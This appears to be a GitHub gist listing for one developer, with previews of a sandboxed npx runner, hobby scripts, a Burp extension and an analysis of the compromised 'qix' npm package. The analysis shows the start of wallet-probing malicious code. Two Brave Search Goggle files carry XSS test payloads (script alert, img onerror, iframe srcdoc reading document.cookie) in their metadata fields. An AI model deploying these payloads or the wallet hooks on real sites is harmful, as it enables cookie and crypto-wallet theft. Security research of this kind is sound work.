Andrea thypon
@thypon
thypon / npxs
Last active September 22, 2025 15:58
Secure NPX Runner, useful for stdio MCP
#!/bin/sh
# npxs - Sandboxed npx runner for secure MCP server execution
#
# Installation:
# wget https://gist.githubusercontent.com/thypon/ec4bb090d6ca1ffd0baac3a4f2c6a106/raw/npxs
# chmod +x npxs
# mv npxs ~/.local/bin/ # or any directory in your PATH
#
# Usage:
# Use 'npxs' instead of 'npx' when running MCP servers for sandboxed execution
@thypon
thypon / malware_analysis.js
Created September 8, 2025 19:16
qix compromised security analysis
// Global state variables
var hasEthereumWallet = 0; // Flag to track if Ethereum wallet is detected
var hasRunOnce = 0; // Flag to prevent multiple executions
var hasInitialized = 0; // Flag to track if initialization is complete
// Function to check for Ethereum wallet presence and initialize malicious hooks
async function checkEthereumWallet() {
try {
// Attempts to get Ethereum accounts - SECURITY RISK: This is probing for wallet access
const ethAccounts = await window.ethereum.request({
@thypon
thypon / art.py
Created May 2, 2023 17:38
Image Uploader for Samsung Art Displays, from HTTP(S) addresses
import sys
import logging
import os
import random
import json
import argparse
from PIL import Image
import requests
from io import BytesIO
@thypon
thypon / haunted-webring.html
Last active January 27, 2023 13:43
Simple Haunted Iframe Webring
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Haunted IFrame</title>
</head>
<body>
require 'httparty'
require 'date'
require 'pry'
# In order to use:
#
# 1. Create a token with
# scopes read:accounts read:favourites read:statuses write:favourites write:statuses
# in https://mastodon.social/settings/applications, copy "Your access token"
# 2. Find your user ID by inspecting the /search queries through an intercepting proxy
@thypon
thypon / hashtags.user.js
Last active December 19, 2022 23:44
Mastodon HackFix hashtags
// ==UserScript==
// @name Fix Mastodon Hashtags
// @namespace http://tampermonkey.net/
// @version 0.1
// @description Fix the hashtag issue in mastodon
// @author [email protected]
// @match https://*/*
// @icon https://www.google.com/s2/favicons?sz=64&domain=tampermonkey.net
// @grant none
// ==/UserScript==
! name: <script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href='/settings'>Settings</a>.&quot;,&quot;Learn more&quot;:&quot;Learn more&quot;}}"></script>test<a>test</a><img src=x onerror=prompt(domain)><h1><marquee>XSS</marquee></h1>
! description: Rtest http://thomasg.fr/
! public: true
! author: Goggles<script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href
@thypon
thypon / custom-netsec.googles
Last active November 28, 2022 10:49
Custom Netsec Goggle
! name: MyNetsec
! description: Prioritizes domains popular with the information security community. Primarily uses submissions and scoring from /r/netsec.
! public: true
! author: Andrea Brancaleoni
! avatar: #ff0000
! homepage: https://github.com/thypon
! Goggle extras
$discard
$boost=3,site=github.io
! name: <iframe srcdoc="<p>Hello world!<script>alert(document.cookie)</script></p>" src="demo_iframe_srcdoc.htm"><p>Your browser does not support iframes.</p></iframe>test
! description: Rtest http://thomasg.fr/
! public: true
! author: <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>test
! avatar: #9244e0
$discard
$downrank,site=medium.com
$boost=1,site=github.io
$boost=1,site=micro.blog
/blog.$boost=1
@thypon
thypon / gdpr.py
Created January 7, 2022 00:11
Create a CSV containing all the cookies encountered during a BURP scan
# Author: Andrea Brancaleoni
# Version: 1.0
# License: MIT License
from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IContextMenuFactory
from javax.swing import JMenuItem, JFileChooser